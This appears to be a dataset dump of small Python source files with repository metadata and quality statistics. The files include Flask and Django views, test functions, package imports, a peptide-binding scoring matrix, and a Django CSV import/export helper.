| 21 | 74 | 0.547619 | 17 | 84 | 2.705882 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.253521 | 0.154762 | 84 | 3 | 75 | 28 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0.590361 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
565d1e5e1c141c954054353557aeaf84f7666c49 | 140 | py | Python | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | from . import main
from flask import render_template
# landing page
@main.route('/')
def home():
return render_template('index.html')
| 15.555556 | 40 | 0.721429 | 19 | 140 | 5.210526 | 0.736842 | 0.282828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 140 | 8 | 41 | 17.5 | 0.838983 | 0.085714 | 0 | 0 | 0 | 0 | 0.088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
5676d89039606acc19eab955a5740e6bbdd4e532 | 265 | py | Python | reward/batcher/__init__.py | lgvaz/torchrl | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | 5 | 2018-06-21T14:33:40.000Z | 2018-08-18T02:26:03.000Z | reward/batcher/__init__.py | lgvaz/reward | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | null | null | null | reward/batcher/__init__.py | lgvaz/reward | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | 2 | 2018-05-08T03:34:49.000Z | 2018-06-22T15:04:17.000Z | from .base_batcher import BaseBatcher
from .rollout_batcher import RolloutBatcher
from .replay_batcher import ReplayBatcher
from .prioritized_replay_batcher import PrReplayBatcher
from .demo_replay_batcher import DemoReplayBatcher
import reward.batcher.transforms
| 33.125 | 55 | 0.886792 | 31 | 265 | 7.354839 | 0.483871 | 0.285088 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086792 | 265 | 7 | 56 | 37.857143 | 0.942149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b24dd51019898c02180822ff9f623866d5b207e | 25 | py | Python | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | 1 | 2022-02-26T21:43:19.000Z | 2022-02-26T21:43:19.000Z | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | null | null | null | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | null | null | null | from utils import Camera
| 12.5 | 24 | 0.84 | 4 | 25 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b5771f237adc11d33dc88f220736794c9c4b286 | 319 | py | Python | tests/test_get_stats.py | jeremiahfallin/roleML | 47539f2be594347e64339a0fcc42fececc9db298 | [
"MIT"
] | 55 | 2019-03-19T03:57:06.000Z | 2021-11-21T01:40:24.000Z | tests/test_get_stats.py | jeremiahfallin/roleML | 47539f2be594347e64339a0fcc42fececc9db298 | [
"MIT"
] | 19 | 2019-03-12T03:49:19.000Z | 2021-10-04T18:48:57.000Z | tests/test_get_stats.py | RiftNemesis/roleML | 78fcda9459339d764c92c584fb59e61e09c3c5a9 | [
"MIT"
] | 19 | 2019-03-13T04:40:08.000Z | 2021-09-27T13:16:52.000Z | from roleml.features import _get_stats_at_10
def test_get_stats_na(clean_game_na):
assert clean_game_na["stats_at_10"] == _get_stats_at_10(clean_game_na["game"]["timeline"])
def test_get_stats_euw(clean_game_euw):
assert clean_game_euw["stats_at_10"] == _get_stats_at_10(clean_game_euw["game"]["timeline"])
| 31.9 | 96 | 0.789969 | 56 | 319 | 3.892857 | 0.285714 | 0.247706 | 0.206422 | 0.165138 | 0.275229 | 0.275229 | 0.275229 | 0.275229 | 0.275229 | 0 | 0 | 0.034364 | 0.087774 | 319 | 9 | 97 | 35.444444 | 0.714777 | 0 | 0 | 0 | 0 | 0 | 0.144201 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
8e7212814b34289385934136e01fb6f2e85cd068 | 60 | py | Python | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from . import cli
from . import cpy
| 10 | 21 | 0.683333 | 10 | 60 | 4.1 | 0.8 | 0.487805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 60 | 5 | 22 | 12 | 0.854167 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8e933e821dc734be6253b25e92b64001ba026e77 | 2,551 | py | Python | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | B_53_01_10 = {0: {'A': 0.264, 'C': -0.444, 'E': 0.109, 'D': 0.329, 'G': 0.102, 'F': -0.991, 'I': -0.163, 'H': -0.304, 'K': 0.557, 'M': -0.463, 'L': -0.322, 'N': 0.117, 'Q': 0.481, 'P': 1.036, 'S': 0.256, 'R': 0.223, 'T': 0.208, 'W': -0.2, 'V': 0.044, 'Y': -0.838}, 1: {'A': -0.327, 'C': 0.032, 'E': 0.43, 'D': 0.13, 'G': 0.002, 'F': 0.024, 'I': -0.168, 'H': 0.052, 'K': 0.37, 'M': -0.245, 'L': 0.058, 'N': 0.254, 'Q': 0.294, 'P': -1.203, 'S': -0.021, 'R': 0.206, 'T': 0.134, 'W': 0.049, 'V': -0.43, 'Y': 0.36}, 2: {'A': -0.007, 'C': -0.005, 'E': -0.035, 'D': 0.02, 'G': 0.013, 'F': -0.055, 'I': -0.174, 'H': 0.088, 'K': 0.187, 'M': -0.161, 'L': -0.087, 'N': 0.066, 'Q': -0.002, 'P': 0.053, 'S': 0.098, 'R': 0.133, 'T': 0.052, 'W': -0.049, 'V': -0.111, 'Y': -0.023}, 3: {'A': 0.042, 'C': -0.053, 'E': -0.039, 'D': -0.035, 'G': -0.043, 'F': -0.056, 'I': -0.015, 'H': 0.045, 'K': 0.116, 'M': -0.023, 'L': 0.0, 'N': -0.01, 'Q': 0.004, 'P': 0.015, 'S': 0.01, 'R': 0.12, 'T': 0.005, 'W': -0.059, 'V': 0.004, 'Y': -0.028}, 4: {'A': 0.123, 'C': 0.004, 'E': 0.001, 'D': -0.104, 'G': 0.084, 'F': -0.219, 'I': -0.164, 'H': 0.012, 'K': 0.198, 'M': -0.153, 'L': -0.093, 'N': 0.047, 'Q': 0.139, 'P': 0.139, 'S': 0.076, 'R': 0.255, 'T': 0.002, 'W': -0.166, 'V': -0.02, 'Y': -0.162}, 5: {'A': 0.108, 'C': 0.083, 'E': 0.047, 'D': 0.031, 'G': 0.035, 'F': -0.065, 'I': -0.103, 'H': 0.046, 'K': 0.122, 'M': -0.062, 'L': -0.13, 'N': 0.022, 'Q': -0.032, 'P': -0.102, 'S': 0.054, 'R': 0.14, 'T': -0.059, 'W': -0.002, 'V': -0.06, 'Y': -0.073}, 6: {'A': 0.079, 'C': -0.061, 'E': -0.057, 'D': -0.087, 'G': -0.011, 'F': -0.04, 'I': 0.043, 'H': 0.071, 'K': 0.217, 'M': -0.023, 'L': -0.024, 'N': -0.03, 'Q': -0.016, 'P': 0.052, 'S': 0.001, 'R': 0.211, 'T': -0.074, 'W': -0.131, 'V': -0.008, 'Y': -0.116}, 7: {'A': -0.056, 'C': -0.086, 'E': -0.063, 'D': 0.018, 'G': 0.17, 'F': 0.033, 'I': -0.046, 'H': 0.065, 'K': 0.292, 'M': -0.148, 'L': -0.183, 'N': 0.07, 'Q': 0.002, 'P': 0.16, 'S': 0.081, 'R': 0.11, 'T': -0.077, 'W': -0.17, 'V': -0.041, 'Y': -0.133}, 8: {'A': 0.207, 'C': -0.009, 'E': -0.004, 'D': 0.101, 'G': 0.067, 'F': -0.08, 'I': -0.101, 'H': -0.02, 'K': 0.201, 'M': -0.092, 'L': -0.177, 'N': -0.148, 'Q': -0.087, 'P': 0.03, 'S': 0.069, 'R': 0.231, 'T': 0.023, 'W': -0.102, 'V': -0.018, 'Y': -0.091}, 9: {'A': 0.587, 'C': -0.484, 'E': 0.356, 'D': 0.471, 'G': 0.078, 'F': -0.861, 'I': -0.424, 'H': -0.112, 'K': 0.227, 'M': -0.246, 'L': -0.135, 'N': 0.043, 'Q': 0.124, 'P': 0.923, 'S': 0.266, 'R': 0.38, 'T': 0.282, 'W': -1.46, 'V': 0.383, 'Y': -0.399}, -1: {'con': 4.5361}} | 2,551 | 2,551 | 0.392003 | 618 | 2,551 | 1.613269 | 0.304207 | 0.02006 | 0.01003 | 0.012036 | 0.042126 | 0 | 0 | 0 | 0 | 0 | 0 | 0.371081 | 0.162289 | 2,551 | 1 | 2,551 | 2,551 | 0.095461 | 0 | 0 | 0 | 0 | 0 | 0.079545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ef2068fe56c6948a0b65c3b7863738bba790c30 | 16,910 | py | Python | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.apps import apps
import numpy as np
import pandas as pd
import os
import json
# Help Functions
def export_module(model_data):
'''
Function to export data
'''
if not os.path.exists(settings.EXPORT_DIR):
if not os.path.exists(settings.VAR_DIR):
os.makedirs(settings.VAR_DIR)
os.makedirs(settings.EXPORT_DIR)
model = apps.get_model(model_data['app_name'], model_data['model_name'])
if model_data['app_name'] == 'stock' and model_data['model_name'] == 'Item':
file_name = 'items.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.filter(
is_assembly=False).values_list(
'code', 'desciption', 'barcode', 'stock_limit',
'category__name', 'price',
'location__location__name', 'location__name',
'note', 'is_active',),
columns=(
'code', 'desciption', 'barcode',
'stock_limit', 'category', 'price',
'location', 'sub_location',
'note', 'is_active')
)
data = data.set_index('code')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'items',
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'Category':
file_name = 'categories.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list('id', 'name'),
columns=('id', 'name')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'categories',
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'SubLocation':
file_name = 'locations.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'location__name', 'name'),
columns=(
'id', 'location', 'sub_location')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'locations',
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'Customer':
file_name = 'customers.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'company__name',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note'),
columns=(
'id', 'company', 'barcode',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'customers',
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'CustomerCompany':
file_name = 'customers_companies.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note'),
columns=(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note')
)
data = data.set_index('name')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': "customers' companies",
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'Vendor':
file_name = 'vendors.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'company__name',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note'),
columns=(
'id', 'company', 'barcode',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'vendors',
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'VendorCompany':
file_name = 'vendors_companies.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note'),
columns=(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note')
)
data = data.set_index('name')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': "vendors' companies",
'path' :os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
else:
return 'error'
def import_module(model_data, file_name, request_user):
'''
Function to import data
'''
if not os.path.exists(settings.IMPORT_DIR):
if not os.path.exists(settings.VAR_DIR):
os.makedirs(settings.VAR_DIR)
os.makedirs(settings.IMPORT_DIR)
model = apps.get_model(model_data['app_name'], model_data['model_name'])
objects = list()
data = pd.read_csv(os.path.join(settings.IMPORT_DIR, file_name))
if model_data['app_name'] == 'stock' and model_data['model_name'] == 'Item':
for i in list(data.index.values):
if not model.objects.filter(code=pd_handeler(data.loc[i, 'code'])).exists():
category_model = apps.get_model(
model_data['app_name'], 'Category')
category = category_model.objects.get_or_create(
name=data.loc[i, 'category'])
location_model = apps.get_model(
model_data['app_name'], 'Location')
location = location_model.objects.get_or_create(
name=data.loc[i, 'location'])
sub_location_model = apps.get_model(
model_data['app_name'], 'SubLocation')
sub_location = sub_location_model.objects.get_or_create(
location=location[0],
name=data.loc[i, 'sub_location'])
object = model(
code=pd_handeler(data.loc[i, 'code']),
desciption=pd_handeler(data.loc[i, 'desciption']),
barcode=pd_handeler(data.loc[i, 'barcode']),
stock_limit=pd_handeler(data.loc[i, 'stock_limit']),
category=category[0],
price=pd_handeler(data.loc[i, 'price']),
location=sub_location[0],
note=pd_handeler(data.loc[i, 'note']),
is_active=pd_handeler(data.loc[i, 'is_active']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) items"
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'Category':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) categories"
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'SubLocation':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'sub_location'])).exists():
location_model = apps.get_model(
model_data['app_name'], 'Location')
location = location_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'location']))
object = model(
location=location[0],
name=pd_handeler(data.loc[i, 'sub_location']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) locations"
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'Customer':
for i in list(data.index.values):
company_model = apps.get_model(
model_data['app_name'], 'CustomerCompany')
company = company_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'company']))
object = model(
company=company[0],
first_name=pd_handeler(data.loc[i, 'first_name']),
last_name=pd_handeler(data.loc[i, 'last_name']),
email=pd_handeler(data.loc[i, 'email']),
department=pd_handeler(data.loc[i, 'department']),
job=pd_handeler(data.loc[i, 'job']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) customers"
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'CustomerCompany':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
desciption=pd_handeler(data.loc[i, 'desciption']),
phone=pd_handeler(data.loc[i, 'phone']),
website=pd_handeler(data.loc[i, 'website']),
taxs_code=pd_handeler(data.loc[i, 'taxs_code']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) customers' companies"
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'Vendor':
for i in list(data.index.values):
company_model = apps.get_model(
model_data['app_name'], 'VendorCompany')
company = company_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'company']))
object = model(
company=company[0],
first_name=pd_handeler(data.loc[i, 'first_name']),
last_name=pd_handeler(data.loc[i, 'last_name']),
email=pd_handeler(data.loc[i, 'email']),
department=pd_handeler(data.loc[i, 'department']),
job=pd_handeler(data.loc[i, 'job']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) vendors"
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'VendorCompany':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
desciption=pd_handeler(data.loc[i, 'desciption']),
phone=pd_handeler(data.loc[i, 'phone']),
website=pd_handeler(data.loc[i, 'website']),
taxs_code=pd_handeler(data.loc[i, 'taxs_code']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) vendors' companies"
else:
return 'error'
try:
model.objects.bulk_create(objects)
return {
'message': message,
'file_name': file_name
}
except Exception as error_type:
print(error_type)
return 'error'
def pd_handeler(value):
'''
Handele the dataframe values before save it to database
'''
if str(value) == str(np.nan):
return None
else:
return value
| 47.903683 | 97 | 0.457895 | 1,609 | 16,910 | 4.595401 | 0.07831 | 0.057344 | 0.047606 | 0.094266 | 0.838382 | 0.823235 | 0.808493 | 0.784961 | 0.774547 | 0.763186 | 0 | 0.001341 | 0.426907 | 16,910 | 352 | 98 | 48.039773 | 0.761635 | 0.007037 | 0 | 0.677116 | 0 | 0 | 0.131764 | 0.004148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009404 | false | 0 | 0.031348 | 0 | 0.081505 | 0.003135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d92460c17622d3c81fed9ffb78649c9a05c2ac38 | 36 | py | Python | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | from .main import compare_date_range | 36 | 36 | 0.888889 | 6 | 36 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d961c7f21582181bd9aef789900aa2f3314dcf3f | 87 | py | Python | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | def context_processor(func):
def context(request):
pass
return context
| 17.4 | 28 | 0.666667 | 10 | 87 | 5.7 | 0.7 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.264368 | 87 | 4 | 29 | 21.75 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.25 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
d964bc6505f66488c8ce182adad8624fd86a898a | 185 | py | Python | src/django-nonrel/tests/regressiontests/formwizard/urls.py | adamjmcgrath/glancydesign | 826ede7c639879d5b79ee730eb5e91422768cb02 | [
"BSD-3-Clause"
] | 790 | 2015-01-03T02:13:39.000Z | 2020-05-10T19:53:57.000Z | tests/regressiontests/formwizard/urls.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 1,361 | 2015-01-08T23:09:40.000Z | 2020-04-14T00:03:04.000Z | tests/regressiontests/formwizard/urls.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 155 | 2015-01-08T22:59:31.000Z | 2020-04-08T08:01:53.000Z | from django.conf.urls.defaults import *
from forms import ContactWizard, Page1, Page2, Page3
urlpatterns = patterns('',
url(r'^wiz/$', ContactWizard([Page1, Page2, Page3])),
)
| 26.428571 | 57 | 0.697297 | 22 | 185 | 5.863636 | 0.727273 | 0.27907 | 0.356589 | 0.434109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038217 | 0.151351 | 185 | 6 | 58 | 30.833333 | 0.783439 | 0 | 0 | 0 | 0 | 0 | 0.032432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d999932c0cb5d5f44969e6c0f4efde644db35bd1 | 107 | py | Python | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 86 | 2021-03-24T02:10:17.000Z | 2022-03-30T03:35:41.000Z | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 5 | 2021-06-03T09:23:30.000Z | 2022-03-30T09:13:26.000Z | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 10 | 2021-05-18T04:15:39.000Z | 2021-11-25T09:32:05.000Z | from .core import *
from .datasets import *
from .models import *
from .ops import *
from .runner import *
| 17.833333 | 23 | 0.719626 | 15 | 107 | 5.133333 | 0.466667 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186916 | 107 | 5 | 24 | 21.4 | 0.885057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
